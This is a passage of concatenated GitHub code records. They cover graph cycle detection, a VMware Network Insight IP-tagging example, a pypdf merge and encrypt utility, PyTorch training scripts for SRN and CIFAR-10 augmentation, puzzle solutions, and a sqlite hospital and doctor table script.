datasets","repo_name":"evendrow/somoformer","sub_path":"src/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":11674,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"79"} +{"seq_id":"1126394004","text":"\"\"\"\nTime complexity: O(v + e) vertices + edges. 
DFS visits all vertices and edges.\nSpace complexity: O(v)\n"""\n\n\ndef is_node_in_cycle(node: 'int', edges: 'list[list[int]]', visited: 'list[bool]', in_stack: 'list[bool]'):\n    visited[node] = True\n    in_stack[node] = True\n\n    neighbours = edges[node]\n    for neighbour in neighbours:\n        if not visited[neighbour]:\n            contains_cycle = is_node_in_cycle(neighbour, edges, visited, in_stack)\n            if contains_cycle:\n                return True\n        elif in_stack[neighbour]:\n            return True\n    in_stack[node] = False\n    return False\n\n\ndef cycle_in_graph(edges: 'list[list[int]]'):\n    number_of_nodes = len(edges)\n    visited = [False for _ in range(number_of_nodes)]\n    in_stack = [False for _ in range(number_of_nodes)]\n\n    for node in range(number_of_nodes):\n        if visited[node]:\n            continue\n        contains_cycle = is_node_in_cycle(node, edges, visited, in_stack)\n        if contains_cycle:\n            return True\n    \n    return False\n\n\ndef main() -> None:\n    edges = [\n        [1, 3],\n        [2, 3, 4],\n        [0],\n        [],\n        [2, 5],\n        []\n    ]\n\n    ans = cycle_in_graph(edges)\n    print(f'The answer is: {ans}')\n\n    \nif __name__ == '__main__':\n    main()\n","repo_name":"mynameischokan/coding-problems","sub_path":"Graphs/cycle_in_graph.py","file_name":"cycle_in_graph.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"79"}
{"seq_id":"31766674843","text":"import csv\nimport ipaddress\nimport json\nimport init_api_client\nimport argparse\nimport swagger_client\nimport utilities\nimport logging\nfrom swagger_client.rest import ApiException\n\nlogger = logging.getLogger(\"vrni_sdk\")\n\n\ndef main(args):\n    settings_api = swagger_client.SettingsApi()\n\n    if args.action == 'add':\n        logger.info(\"Adding IP-Addresses to EAST_WEST/INTERNET Tag\")\n        with open(\"{}\".format(args.ip_tags_csv), 'r') as csvFile:\n            ip_tags = csv.DictReader(csvFile)\n            for ip_tag in ip_tags:\n                ip_addresses = ip_tag['IP_Addresses']\n                tag_id = ip_tag['TAG_ID']\n                body = get_body(ip_addresses, tag_id)\n                try:\n                    logger.info(\"Adding {} to {} tag\".format(\n                        ip_addresses, tag_id))\n                    settings_api.add_ip_tag(tag_id, body)\n                except ApiException as e:\n                    logger.exception(\n                        \"Failed adding {} to tag: {} : Error : {} \".format(ip_addresses, tag_id,\n                                                                           json.loads(e.body)))\n    if args.action == 'remove':\n        logger.info(\"Removing IP-Addresses from EAST_WEST/INTERNET Tag\")\n        with open(\"{}\".format(args.ip_tags_csv), 'r') as csvFile:\n            ip_tags = csv.DictReader(csvFile)\n            for ip_tag in ip_tags:\n                ip_addresses = ip_tag['IP_Addresses']\n                tag_id = ip_tag['TAG_ID']\n                body = get_body(ip_addresses, tag_id)\n                try:\n                    logger.info(\"removing {} from {} tag\".format(\n                        ip_addresses, tag_id))\n                    settings_api.remove_ip_tag(tag_id, body)\n                except ApiException as e:\n                    logger.exception(\n                        \"Failed removing {} from tag: {} : Error : {} \".format(ip_addresses, tag_id,\n                                                                               json.loads(e.body)))\n\n    if args.action == 'get':\n        logger.info(\"Getting IP-Addresses with EAST_WEST/INTERNET Tag\")\n        with open(\"{}\".format(args.ip_tags_csv), 'w') as csvFile:\n            fields = [\"IP_Addresses\", \"TAG_ID\"]\n            writer = csv.DictWriter(csvFile, fieldnames=fields)\n            writer.writeheader()\n            ip_tag_ids = settings_api.get_ip_tag_ids()\n            data = []\n            for tag_id in ip_tag_ids.tag_ids:\n                ip_tags = settings_api.get_ip_tag(tag_id)\n                for ip_tag in ip_tags.ip_address_ranges:\n                    data_dict = {}\n                    data_dict['TAG_ID'] = ip_tags.tag_id\n                    if ip_tag.start_ip == ip_tag.end_ip:\n                        data_dict['IP_Addresses'] = ip_tag.start_ip\n                        data.append(data_dict)\n                    else:\n                        data_dict['IP_Addresses'] = \"{}-{}\".format(\n 
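The `in_stack` flag is what distinguishes a back edge (a genuine cycle) from a mere revisit of an already finished vertex. A short usage check against the adjacency-list format above, assuming `cycle_in_graph` is in scope:

cyclic = [[1], [2], [0]]        # 0 -> 1 -> 2 -> 0, a back edge to 0
acyclic = [[1, 2], [2], []]     # a DAG: revisits of 2 are cross edges, not cycles
print(cycle_in_graph(cyclic))   # True
print(cycle_in_graph(acyclic))  # False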
ip_tag.start_ip, ip_tag.end_ip)\n data.append(data_dict)\n data = data + [{\"IP_Addresses\": subnet, 'TAG_ID': ip_tags.tag_id}\n for subnet in ip_tags.subnets]\n writer.writerows(data)\n for value in data:\n logger.info(\"Got {} with {} Tag\".format(\n value['IP_Addresses'], value['TAG_ID']))\n\n\ndef get_body(ip_address, tag_id):\n body = {\"tag_id\": \"{}\".format(tag_id)}\n if \"-\" in ip_address:\n ips = ip_address.split(\"-\")\n start_ip = ips[0]\n end_ip = ips[1]\n body[\"ip_address_ranges\"] = [{\"start_ip\": \"{}\".format(start_ip),\n \"end_ip\": \"{}\".format(end_ip)}]\n elif \"/\" in ip_address:\n body[\"subnets\"] = [\"{}\".format(ip_address)]\n else:\n body[\"ip_address_ranges\"] = [{\"start_ip\": \"{}\".format(ip_address),\n \"end_ip\": \"{}\".format(ip_address)}]\n return body\n\n\ndef parse_arguments():\n parser = init_api_client.parse_arguments()\n parser.add_argument(\"--ip_tags_csv\", action=\"store\",\n default='ip_tags.csv', help=\"Name of csv file\")\n parser.add_argument(\"--action\", action=\"store\",\n default='get', help=\"Action can be 'add' 'get' or 'remove'\")\n\n args = parser.parse_args()\n return args\n\n\nif __name__ == '__main__':\n args = parse_arguments()\n utilities.configure_logging(\"/tmp\")\n api_client = init_api_client.get_api_client(args)\n main(args)\n","repo_name":"vmware/network-insight-sdk-python","sub_path":"examples/ip_tagging.py","file_name":"ip_tagging.py","file_ext":"py","file_size_in_byte":4493,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"79"} +{"seq_id":"23368373789","text":"from bisect import bisect_left as bs\n\nif __name__ == '__main__':\n n, k = [int(__) for __ in input().strip().split()]\n s = input().strip()\n li = sorted(list(set(s)))\n if k > n:\n print(s + li[0] * (k - n))\n elif k == n:\n for i in range(n - 1, -1, -1):\n idx = bs(li, s[i])\n if idx != len(li) - 1:\n print(s[:i] + li[idx + 1] + li[0] * (n - i - 1))\n break\n else:\n print(s[:k - 1] + s[k])\n","repo_name":"bvsbrk/Algos","sub_path":"src/Codeforces/round_466/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"28194610299","text":"import torch\r\nfrom torch.utils.data import Dataset\r\nfrom srns import *\r\nimport os\r\nfrom torch.utils.tensorboard import SummaryWriter\r\nimport numpy as np\r\nfrom dataloader_srn import *\r\nfrom torch.utils.data import DataLoader\r\nimport utils\r\nfrom comon import *\r\nimport logging\r\n\r\nif __name__== '__main__':\r\n intrinsic_matrix = utils.parse_intrinsics(intrinsics_file_path) \r\n \r\n \r\n if validat1:\r\n val_dataset = class1(val_data_dir,num_instances,image_sidelength)\r\n\r\n\r\n val_dataloader =Dataloader(val_dataset,batch_size = batch_size,shuffle=false,drop_last= true)\r\n \r\n id1 = torch.LongTensor([[2]])\r\n id1 = id1.to(device)\r\n model = SRNS(input_size,output_size,hidden_state_size,pixel_output)\r\n if torch.cuda.is_available():\r\n model = model.cuda()\r\n #train_dataset = class1(data_dir,num_instances,image_sidelength)\r\n train_dataset = class1(\"C:/Users/DELL/Desktop/Current_fields/SRN/dataset/shepard_metzler_train/\",20,64)\r\n train_dataloader = DataLoader(train_dataset,batch_size = 4,shuffle=True,num_workers=0)\r\n\r\n\r\n \r\n model.train()\r\n model.cuda()\r\n #results_path = os.path.join(root_dir,\"results\")\r\n if not os.path.isdir(results_path):\r\n os.mkdir(results_path)\r\n #log_path = 
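`get_body` classifies a spec purely by substring ("-" for a range, "/" for a subnet), even though the module imports `ipaddress` without using it. A hedged sketch of the same classification with stdlib validation; `classify_spec` is illustrative and not part of the SDK:

import ipaddress

def classify_spec(spec):
    # Same three shapes as get_body above, but each piece is validated.
    if "-" in spec:
        start, end = (ipaddress.ip_address(p) for p in spec.split("-"))
        return {"ip_address_ranges": [{"start_ip": str(start), "end_ip": str(end)}]}
    if "/" in spec:
        return {"subnets": [str(ipaddress.ip_network(spec, strict=False))]}
    ip = ipaddress.ip_address(spec)
    return {"ip_address_ranges": [{"start_ip": str(ip), "end_ip": str(ip)}]}

print(classify_spec("10.0.0.1-10.0.0.9"))
print(classify_spec("192.168.1.0/24"))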
os.path.join(results_path,\"log_files\")\r\n #tensorboard_dir = os.path.join(results_path,'tensorboard_files')\r\n #checkpoints_dir = os.path.join(results_path,\"checkpoints\")\r\n if not os.path.isdir(log_path):\r\n os.mkdir(log_path)\r\n os.mkdir(tensorboard_dir)\r\n if not os.path.isdir(checkpoints_dir):\r\n os.mkdir(checkpoints_dir)\r\n if load_model is not False:\r\n print(\"Loading model from %s\"%save_path)\r\n model.load_state_dict(save_path)\r\n \r\n optimizer = torch.optim.Adam(model.parameters(),lr = lr)\r\n logger = logging.getLogger('LOG')\r\n logger.info(\"learning rate:{}\".format(lr))\r\n logger.info(\"start epoch:{}\".format(start_epoch))\r\n logger.info(\"end epoch:{}\".format(end_epoch))\r\n logger.info(\"Batch_size:{}\".format(train_batch_size))\r\n print(\"training started\")\r\n if torch.cuda.is_available():\r\n print(\"using cuda..........\")\r\n train_dataloader = DataLoader(train_dataset,batch_size=batch_size,shuffle=False)\r\n writer = SummaryWriter(log_dir = log_path)\r\n val_writer = SummaryWriter(log_dir = log_path)\r\n for epoch in range(0,n_epochs):\r\n iter = 0\r\n for inputs in train_dataloader:\r\n for objects in inputs:\r\n iter+=1\r\n if torch.cuda.is_available(): \r\n #print('using cuda........')\r\n #images,extrinsics,intrinsics = objects\r\n images = objects[0]\r\n extrinsics = objects[2]\r\n intrinsics =objects[1]\r\n #inputs = inputs.to(device)\r\n images = images.to(device)\r\n extrinsics = extrinsics.to(device)\r\n intrinsics = intrinsics.to(device)\r\n \r\n \r\n #labels = labels.to(device)\r\n translations = extrinsics[:,:,-1]\r\n pixels,depths =model(id1,images,extrinsics,intrinsics,translations)\r\n\r\n optimizer.zero_grad()\r\n\r\n #image_loss = model.image_loss_l2(inputs,outputs)\r\n #image_loss = model.image_loss_l2(inputs,id1)\r\n image_loss = model.image_loss_l2()\r\n latent_loss = model.latent_loss_embed(lamb1)\r\n depth_reg_loss = model.depth_reg_loss_l2(depths,lamb1)\r\n #weight2*latent_loss + weight3*depth_reg_loss\r\n total_loss = weight1*image_loss \r\n total_loss.backward(retain_graph=True)\r\n \r\n optimizer.step()\r\n print('____________________________________________________________________________________________________________________________________')\r\n print('iter:{}'.format(iter),\"||\",'epoch:{}'.format(epoch),\"||\",'lr:{:.6f}'.format(lr),\"||\",'recons_loss:{:.6f}'.format(image_loss),\"||\",'embed_loss:{}'.format(latent_loss),\"||\",'depth_reg_loss:{}'.format(depth_reg_loss))\r\n #print('iter:{}'.format(iter),'epoch:{}'.format(epoch),'lr:{:.6f}'.format(lr),'recons_loss:{:.6f}'.format(image_loss))\r\n writer.add_scalar('recon_loss',image_loss,epoch)\r\n writer.add_scalar('embed_loss',latent_loss,epoch)\r\n writer.add_scalar('depth_reg_loss',depth_reg_loss,epoch) \r\n if epoch%SAVE_MODEL_EPOCH==0:\r\n print(\"running val set...........\")\r\n\r\n model.eval()\r\n with torch.no_grad():\r\n dist_losses = [] \r\n for inputs in val_dataloader:\r\n if torch.cuda.is_available():\r\n inputs = inputs.to(device)\r\n #labels = labels.to(device)\r\n ouputs = model(inputs)\r\n dist_loss = model.image_loss_l2(inputs,outputs)\r\n dist_losses.append(dist_losses)\r\n\r\n \r\n model.train()\r\n print(\"validation_loss:{:.6f}\".format(np.mean(dist_loss)))\r\n val_writer.add_scalar('recon_loss',np.mean(dist_loss),epoch)\r\n torch.save(model.state_dict,os.path.join(checkpoints_dir,'epoch%d.pth'%epoch))\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n 
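The script above passes a file path straight to `load_state_dict` and saves the bound `model.state_dict` method rather than its result; the conventional PyTorch checkpoint pattern passes a state-dict object in both directions. A minimal sketch (the module and paths are illustrative):

import torch
from torch import nn

model = nn.Linear(4, 2)
torch.save(model.state_dict(), "/tmp/epoch0.pth")           # note the call: state_dict()
state = torch.load("/tmp/epoch0.pth", map_location="cpu")   # load the dict first
model.load_state_dict(state)                                # then hand it to the model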
\r\n","repo_name":"nishant34/SRNS","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"41507388105","text":"argList = []\ngraph = {}\n\nclass Graph:\n numPaths = 0\n def __init__(self, graph):\n self.graph = graph\n\n def dfs(self, current, visited, path):\n path.append(current)\n if visited is None:\n visited = set()\n visited.add(current)\n\n if current == 'end':\n print(path)\n self.numPaths += 1\n else: \n for cave in self.graph[current]:\n if cave.islower() and cave in visited:\n pass\n else:\n self.dfs(cave, visited, path)\n\n path.pop()\n visited.discard(current)\n\nwith open('day12_1.in') as f:\n argList = f.readlines()\n\nfor arg in argList:\n start = arg.split('-')[0].strip()\n end = arg.split('-')[1].strip()\n if graph.get(start, []) == []:\n graph[start] = [end]\n else:\n graph[start].append(end) \n\n if graph.get(end, []) == []:\n graph[end] = [start]\n else:\n graph[end].append(start)\n g = Graph(graph)\n \ng.dfs('start', set(), [])\n\nprint(graph)\nprint(g.numPaths)\n","repo_name":"ryanshi42/Advent-of-Code-2021","sub_path":"day12_1.py","file_name":"day12_1.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"73688426176","text":"from py_trees.behaviour import Behaviour\nfrom py_trees.decorators import RunningIsFailure as pyRunningIsFailure\n\n\nclass RunningIsFailure(pyRunningIsFailure):\n def __init__(\n self, \n child: Behaviour,\n attr:dict={},\n ):\n name: str = attr['name'] if 'name' in attr.keys() else 'RunningIsFailure'\n super().__init__(name, child)","repo_name":"sorawit112/BehaviorTree_RCPLY","sub_path":"behaviour_tree_rclpy/behaviours/decorators/RunningIsFailure.py","file_name":"RunningIsFailure.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"29679579161","text":"import pypdf\r\nimport os\r\n\r\n\r\ndef ck_int(): #to conquer the error during input\r\n while True:\r\n try:\r\n var = input(\"Choose from the above option: \")\r\n var = int(var)\r\n break\r\n except ValueError:\r\n print(\"Please enter appropiate option!\")\r\n\r\n return var\r\n\r\n\r\ndef fetch_pdf(path): # to fetch all pdf files \r\n pdf = []\r\n files = sorted(os.listdir(path))\r\n for file in files:\r\n fp = f\"{path}\\\\{file}\" #file path\r\n ext = os.path.splitext(fp)[1].lower() #extension of file\r\n #condition for pdf file\r\n if os.path.isfile(fp) and ext == \".pdf\":\r\n pdf.append(file)\r\n\r\n return pdf\r\n\r\ndef multiple_dir(path,file):\r\n i = 1\r\n while True: #for creating many pdf of same name \r\n if os.path.exists(f\"{path}\\\\{file+str(i)}.pdf\"):\r\n i = i + 1\r\n continue\r\n else:\r\n pdf = open(f\"{path}\\\\{file+str(i)}.pdf\",\"wb\")\r\n pdf.close()\r\n return file+str(i)\r\n \r\n \r\ndef merged_pdf(path):\r\n pdf = fetch_pdf(path)\r\n name = multiple_dir(path,\"merged\")\r\n merger = pypdf.PdfWriter()\r\n for pages in pdf:\r\n merger.append(f\"{path}\\\\{pages}\") \r\n with open(f\"{path}\\\\{name}.pdf\",\"wb\") as file:\r\n merger.write(file)\r\n merger.close()\r\n return f\"{path}\\\\{name}.pdf\"\r\n\r\ndef encrypt_pdf(path,file,pwd):\r\n\r\n name = multiple_dir(path,f\"{file[:-4]}_encrypted\")\r\n reader = pypdf.PdfReader(f\"{path}\\\\{file}\")\r\n writer = pypdf.PdfWriter()\r\n for page in reader.pages: #copy all the 
pages into new pdf\r\n writer.add_page(page)\r\n writer.encrypt(pwd) #lock that pdf\r\n with open(f\"{path}\\\\{name}.pdf\",\"wb\") as file:\r\n writer.write(file) #write the protected pdf into file\r\n writer.close()\r\n return f\"{path}\\\\{name}.pdf\"\r\n\r\ndef decrypt_pdf(path,file,pwd):\r\n\r\n name = multiple_dir(path,f\"{file[:-4]}_decrypted\")\r\n reader = pypdf.PdfReader(f\"{path}\\\\{file}\")\r\n writer = pypdf.PdfWriter()\r\n if reader.is_encrypted:\r\n reader.decrypt(pwd)\r\n for page in reader.pages:\r\n writer.add_page(page)\r\n with open(f\"{path}\\\\{name}.pdf\",\"wb\") as file:\r\n writer.write(file)\r\n writer.close()\r\n return f\"{path}\\\\{name}.pdf\"\r\n \r\n\r\nif __name__ == \"__main__\":\r\n\r\n print(\"Welcome to PDFtools\".center(50, \"*\"), \"\\n\")\r\n cdir = os.getcwd() #current dir\r\n print(\"If you want to use current path then press enter\")\r\n print(f\"Current working path is {cdir}\")\r\n path = input(\"Enter the path: \")\r\n if not (path) or not os.path.exists(path):\r\n path = cdir #current path\r\n print(\"\\nyou didn't specify the path correctly\")\r\n\r\n while True:\r\n #Main Menu\r\n print(\"HomePage\".center(25,\"=\"))\r\n print(\"\\n1.PDF files in current folder\")\r\n print(\"2.Merge the all PDFs present in current folder\")\r\n print(\"3.Custom Merging\")\r\n print(\"4.Encrypt the PDF\")\r\n print(\"5.Decrypt the PDF\")\r\n print(\"6.Change the current folder\")\r\n print(\"7.Exit\\n\")\r\n choice = ck_int()\r\n\r\n if (choice == 1):\r\n\r\n pdf = fetch_pdf(path)\r\n if not pdf:\r\n print(\"\\n No pdf is avalible in current folder!!\")\r\n else :\r\n print(f\"\\nAvailible PDF's : {pdf}\")\r\n\r\n elif (choice == 2):\r\n\r\n print(\"\\n\\nNote: pdf files are merged acc. to alphabet sorting!\")\r\n print(\"Therefore you must place your pdf in alphabet sorting.\")\r\n print(f\"\\nCurrent files in order are: {fetch_pdf(path)}\")\r\n ans = input(\"\\n\\nDo you want to merge the pdf(y/n): \")\r\n if not fetch_pdf(path):\r\n print(\"\\nNo pdf files to merge!!\")\r\n continue\r\n if ans.lower() == \"y\":\r\n out = merged_pdf(path)\r\n print(f\"\\nHere is your merged pdf stored: \\n{out}\")\r\n\r\n elif (choice == 3):\r\n\r\n print(\"\\nAvailible Soon!!!\")\r\n\r\n elif (choice == 4):\r\n\r\n print(\"Encryption\".center(25,\"=\"))\r\n pdf = fetch_pdf(path)\r\n print(\"\\nChoose from the current pdf files: \")\r\n print(pdf)\r\n print(\"Please choose from above pdfs(1,2,3...)\\n\")\r\n ch = ck_int() #choice\r\n if ch not in range(1,len(pdf)+1):\r\n print(\"\\nplease choose from above opotion!!\")\r\n continue\r\n file = pdf[ch-1]\r\n pwd = input(f\"Enter the password for {file}: \")\r\n out = encrypt_pdf(path,file,pwd)\r\n print(f\"\\nHere is your encrypted pdf: \\n{out}\")\r\n\r\n elif (choice == 5):\r\n\r\n print(\"Decryption\".center(25,\"=\"))\r\n pdf = fetch_pdf(path)\r\n print(\"\\nChoose from the current pdf files: \")\r\n print(pdf)\r\n print(\"Please choose from above pdfs(1,2,3...)\\n\")\r\n ch = ck_int() #choice\r\n if ch not in range(len(pdf)+1):\r\n print(\"\\nplease choose from above opotion!!\")\r\n continue\r\n file = pdf[ch-1]\r\n pwd = input(f\"Enter the password for {file}: \")\r\n out = decrypt_pdf(path,file,pwd)\r\n print(f\"\\nHere is your decrypted pdf: \\n{out}\")\r\n\r\n elif (choice == 6):\r\n\r\n folder = input(\"Enter full path of the folder: \")\r\n if not folder or not os.path.exists(folder):\r\n print(\"Enter Valid Input!!\")\r\n continue\r\n os.chdir(folder)\r\n print(f\"Now your current directory is 
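The encrypt/decrypt helpers above copy every page into a fresh writer before locking or unlocking. A compact roundtrip of that pattern with pypdf, assuming a `sample.pdf` exists in the working directory (file names and the password are illustrative):

import pypdf

writer = pypdf.PdfWriter()
for page in pypdf.PdfReader("sample.pdf").pages:   # copy pages, as above
    writer.add_page(page)
writer.encrypt("hunter2")                          # lock the copy
with open("sample_encrypted.pdf", "wb") as fh:
    writer.write(fh)

reader = pypdf.PdfReader("sample_encrypted.pdf")
if reader.is_encrypted:
    reader.decrypt("hunter2")                      # unlock before reading pages
print(len(reader.pages))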
{os.getcwd()}\")\r\n\r\n elif (choice == 7):\r\n\r\n ans = input(\"\\n\\n Confirm to exit (y/n): \")\r\n if ans.lower() == \"y\":\r\n break\r\n else:\r\n print(\"Please enter valid input!!\")\r\n\r\n else:\r\n print(\"\\n\\n Please choose correct option!!\")\r\n","repo_name":"mistabaaz/100DaysOfCode_Python","sub_path":"ex8_merge_the_pdf.py","file_name":"ex8_merge_the_pdf.py","file_ext":"py","file_size_in_byte":5888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"73706772736","text":"import torch\nimport torchvision\nfrom torch import nn\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nfrom d2l import torch as d2l\n\n\n\n\"\"\"\nCIFAR10数据集的加载\n\"\"\"\n# all_images=torchvision.datasets.CIFAR10(train=True,root='./data',download=True)\n#print(all_images.data.shape) #打印一下训练集的形状是50000张图,每张图3通道,32*32大小\n#图像展示\n# d2l.show_images([all_images[i][0] for i in range(32)],4,8,scale=0.8)\n# plt.show()\n#用自己的方法查看一张图像\n# plt.imshow(all_images[0][0])\n# plt.show()\n\n\"\"\"\n定义训练和测试时图片增广的方式\n\"\"\"\ntrain_augs=torchvision.transforms.Compose(\n [torchvision.transforms.RandomHorizontalFlip(),torchvision.transforms.ToTensor()]) #左右翻转,变成向量\n\n\ntest_augs=torchvision.transforms.Compose([torchvision.transforms.ToTensor()]) #变成向量\n\n\n\"\"\"\n定义辅助函数,用于读取图像和应用图像增广\n\"\"\"\ndef load_cifar10(is_train,augs,batch_size):\n #这里用数据增广并没有说增加了图片的张数,可以理解为增加了图片的特征数量\n dataset=torchvision.datasets.CIFAR10(root='./data',train=is_train,transform=augs,download=True)\n dataloader=torch.utils.data.DataLoader(\n dataset,batch_size=batch_size,shuffle=is_train,num_workers=4 #num_workers是设置进程数\n )\n return dataloader\n\n\"\"\"\n定义训练函数,其实是对于每个batch_size来言的\n\"\"\"\ndef train_batch_13(net,X,y,loss,trainer,devices):\n \"\"\"代码是利用多GPU训练的代码\"\"\"\n if isinstance(X,list):\n X=[x.to(devices[0]) for x in X]\n else:\n X=X.to(devices[0])\n\n y=y.to(devices[0])\n #设置训练模型\n net.train()\n trainer.zero_grad()\n pred=net(X)\n l=loss(pred,y)\n l.sum().backward()\n trainer.step()\n train_loss_sum=l.sum()\n train_acc_sum=d2l.accuracy(pred,y)\n return train_loss_sum,train_acc_sum\n\n\ndef train_ch13(net,train_iter,test_iter,loss,trainer,num_epochs,devices=d2l.try_all_gpus()):\n \"\"\"代码是利用多GPU运算的代码\"\"\"\n timer, num_batches = d2l.Timer(), len(train_iter)\n animator = d2l.Animator(xlabel='epoch', xlim=[1, num_epochs], ylim=[0, 1],\n legend=['train loss', 'train acc', 'test acc'])\n net = nn.DataParallel(net, device_ids=devices).to(devices[0]) #多GPU训练的代码,暂时可以不用管\n\n for epoch in range(num_epochs):\n #4个维度:储存训练损失,训练准确度,实例数,特点数\n metric = d2l.Accumulator(4)\n for i,(features,labels) in enumerate(train_iter):\n timer.start()\n l,acc=train_batch_13(net,features,labels,loss,trainer,devices)\n metric.add(l, acc, labels.shape[0], labels.numel())\n timer.stop()\n if (i + 1) % (num_batches // 5) == 0 or i == num_batches - 1:\n animator.add(epoch + (i + 1) / num_batches,\n (metric[0] / metric[2], metric[1] / metric[3],\n None))\n test_acc = d2l.evaluate_accuracy_gpu(net, test_iter)\n animator.add(epoch + 1, (None, None, test_acc))\n print(f'loss {metric[0] / metric[2]:.3f}, train acc '\n f'{metric[1] / metric[3]:.3f}, test acc {test_acc:.3f}')\n print(f'{metric[2] * num_epochs / timer.sum():.1f} examples/sec on '\n f'{str(devices)}')\n\n\nbatch_size,devices,net=256,d2l.try_all_gpus(),d2l.resnet18(10,3)\n\n\n\"\"\"\n显式的初始化网络权重,其实不写也会自动初始化的\n\"\"\"\ndef init_weights(m):\n if type(m) in [nn.Linear,nn.Conv2d]:\n 
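The train pipeline above composes `RandomHorizontalFlip` with `ToTensor`, so augmentation happens on the PIL image and the network then sees float tensors in [0, 1]. A quick check of that contract, assuming torchvision and Pillow are installed; the random image stands in for a CIFAR-10 sample:

import numpy as np
from PIL import Image
import torchvision

augs = torchvision.transforms.Compose([
    torchvision.transforms.RandomHorizontalFlip(),
    torchvision.transforms.ToTensor(),
])
img = Image.fromarray(np.random.randint(0, 256, (32, 32, 3), dtype=np.uint8))
out = augs(img)
print(out.shape, float(out.min()) >= 0.0, float(out.max()) <= 1.0)  # (3, 32, 32) True True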
nn.init.xavier_uniform_(m.weight)\n\nnet.apply(init_weights)\n\n\n\"\"\"\n总函数\n\"\"\"\ndef train_with_data_aug(train_augs,test_augs,net,batch_size,devices,lr=0.001):\n train_iter=load_cifar10(True,train_augs,batch_size)\n test_iter=load_cifar10(False,test_augs,batch_size)\n loss=nn.CrossEntropyLoss(reduction='none') #reduction相当于返回一个列表,列表中存放的是每个样本的损失值 reduction='sum'相当于对这些损失值求和,reduction='mean'相当于对这些损失值求平均\n trainer=torch.optim.Adam(net.parameters(),lr=lr)\n train_ch13(net,train_iter,test_iter,loss,trainer,10,devices)\n\n\ntrain_with_data_aug(train_augs,test_augs,net,batch_size,devices)\nplt.show()\n\n\n\n\n\n\n\n","repo_name":"sydlsp/dive_into_deep_learning_pytorch","sub_path":"ch13/13.1.2 利用图像增广进行训练.py","file_name":"13.1.2 利用图像增广进行训练.py","file_ext":"py","file_size_in_byte":4286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"30377462074","text":"import sqlite3\n\n# defining connection and cursor\nconn = sqlite3.connect('Medical.db')\ncursor = conn.cursor()\ncursor.execute(\"DROP TABLE IF EXISTS Hospital\")\ncursor.execute(\"DROP TABLE IF EXISTS Doctor\")\n\n# creating hospital table\nquery1 = \"\"\"CREATE TABLE \nHospital(Hospital_Id INTEGER PRIMARY KEY NOT NULL, Hospital_Name CHAR(20) NOT NULL, Bed_Count INTEGER NOT NULL)\"\"\"\ncursor.execute(query1)\n\n# inserting into Hospital\ncursor.execute(\"INSERT INTO Hospital VALUES('1', 'Mayo Clinic', 200)\")\ncursor.execute(\"INSERT INTO Hospital VALUES('2', 'Cleveland Clinic', 400)\")\ncursor.execute(\"INSERT INTO Hospital VALUES('3', 'Johns Hopkins', 1000)\")\ncursor.execute(\"INSERT INTO Hospital VALUES('4', 'UCLA Medical Center', 1500)\")\n\n# creating doctor table\nquery2 = \"\"\"CREATE TABLE\nDoctor (Doctor_Id INTEGER PRIMARY KEY NOT NULL, Doctor_Name CHAR(20) NOT NULL, Hospital_Id INTEGER, Joining_Date TEXT, Speciality CHAR(20) NOT NULL, Salary INTEGER NOT NULL, \n Experience, FOREIGN KEY (Hospital_id) REFERENCES Hospital (Hospital_id))\"\"\"\ncursor.execute(query2)\n\n# inserting data into Doctor\ncursor.execute(\"INSERT INTO Doctor VALUES('101', 'David', '1', '2005-2-10', 'Pediatric', '40000', NULL)\")\ncursor.execute(\"INSERT INTO Doctor VALUES('102', 'Michael', '1', '2018-07-23', 'Oncologist', '20000', NULL)\")\ncursor.execute(\"INSERT INTO Doctor VALUES('103', 'Susan', '2', '2016-05-19', 'Garnacologist', '25000', NULL)\")\ncursor.execute(\"INSERT INTO Doctor VALUES('104', 'Robert', '2', '2017-12-28', 'Pediatric ', '28000', NULL)\")\ncursor.execute(\"INSERT INTO Doctor VALUES('105', 'Linda', '3', '2004-06-04', 'Garnacologist', '42000', NULL)\")\ncursor.execute(\"INSERT INTO Doctor VALUES('106', 'William', '3', '2012-09-11', 'Dermatologist', '30000', NULL)\")\ncursor.execute(\"INSERT INTO Doctor VALUES('107', 'Richard', '4', '2014-08-21', 'Garnacologist', '32000', NULL)\")\ncursor.execute(\"INSERT INTO Doctor VALUES('108', 'Karen', '4', '2011-10-17', 'Radiologist', '30000', NULL)\")\n\ndef get_connection():\n connection = sqlite3.connect('Medical.db')\n return connection\n\ndef close_connection(connection):\n if connection:\n connection.close()\n\nspcl = input(\"Speciality: \").lower().capitalize()\nsal = input(\"Salary: \")\nquery = \"\"\"SELECT * from Doctor WHERE Speciality = ? 
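The loss above uses `reduction='none'`, which returns one loss per sample and leaves the reduction (here `l.sum()`) to the training loop. A tiny check of that semantics, assuming PyTorch is installed:

import torch
from torch import nn

logits = torch.randn(4, 10)
labels = torch.randint(0, 10, (4,))
per_sample = nn.CrossEntropyLoss(reduction="none")(logits, labels)
print(per_sample.shape)  # torch.Size([4]): one loss value per sample
print(torch.allclose(per_sample.mean(),
                     nn.CrossEntropyLoss(reduction="mean")(logits, labels)))  # True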
